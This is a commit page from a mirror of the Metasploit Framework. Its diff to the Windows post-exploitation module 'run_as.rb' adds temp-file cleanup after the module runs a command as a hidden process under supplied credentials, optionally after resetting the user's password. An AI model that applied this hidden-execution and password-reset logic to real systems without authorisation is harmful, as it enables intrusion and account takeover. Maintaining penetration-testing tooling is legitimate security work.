infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #9845 Remove temp file after cmd execution

GSoC/Meterpreter_Web_Console
Aaron Soto 2018-04-09 15:40:19 -05:00
parent 251ee7a9e0 be18930f12
commit b83edc0ff6
No known key found for this signature in database
GPG Key ID: A974121808B92094
1 changed files with 16 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
modules/post/windows/manage/run_as.rb
View File

@ -14,7 +14,7 @@ class MetasploitModule < Msf::Post
'Description' => %q( 'Description' => %q(
This module will login with the specified username/password and execute the This module will login with the specified username/password and execute the
supplied command as a hidden process. Output is not returned by default, by setting supplied command as a hidden process. Output is not returned by default, by setting
CMDOUT to false output will be redirected to a temp file and read back in to CMDOUT to true output will be redirected to a temp file and read back in to
display. By setting advanced option SETPASS to true, it will reset the users display. By setting advanced option SETPASS to true, it will reset the users
password and then execute the command. password and then execute the command.
), ),
@ -85,14 +85,15 @@ class MetasploitModule < Msf::Post
fail_with(Failure::Unknown, 'Error resetting password') unless reset_pass(user, password) fail_with(Failure::Unknown, 'Error resetting password') unless reset_pass(user, password)
end end
system_temp = get_env('WINDIR') << '\\Temp' # If command output is requested, then create output file and set open permissions
outpath = "#{system_temp}\\#{Rex::Text.rand_text_alpha(8)}.txt" if cmdout
system_temp = get_env('WINDIR') << '\\Temp'
# Create output file and set permissions so everyone can access outpath = "#{system_temp}\\#{Rex::Text.rand_text_alpha(8)}.txt"
touch(outpath) touch(outpath)
cmdstr = "cmd.exe /c #{cmd} > #{outpath}"
cmdstr = "cmd.exe /c #{cmd}" else
cmdstr = "cmd.exe /c #{cmd} > #{outpath}" if cmdout cmdstr = "cmd.exe /c #{cmd}"
end
# Check privs and execute the correct commands # Check privs and execute the correct commands
# if user use createprocesswithlogon, if system logonuser and createprocessasuser # if user use createprocesswithlogon, if system logonuser and createprocessasuser
@ -119,7 +120,12 @@ class MetasploitModule < Msf::Post
vprint_status("Thread Handle: #{pi[:thread_handle]}") vprint_status("Thread Handle: #{pi[:thread_handle]}")
vprint_status("Process Id: #{pi[:process_id]}") vprint_status("Process Id: #{pi[:process_id]}")
vprint_status("Thread Id: #{pi[:thread_id]}") vprint_status("Thread Id: #{pi[:thread_id]}")
print_status("Command output:\r\n#{tmpout}") unless tmpout.nil? print_status("Command output:\r\n#{tmpout}") if cmdout
end
if cmdout
print_status("Removing temp file #{outpath}")
rm_f(outpath)
end end
end end
end end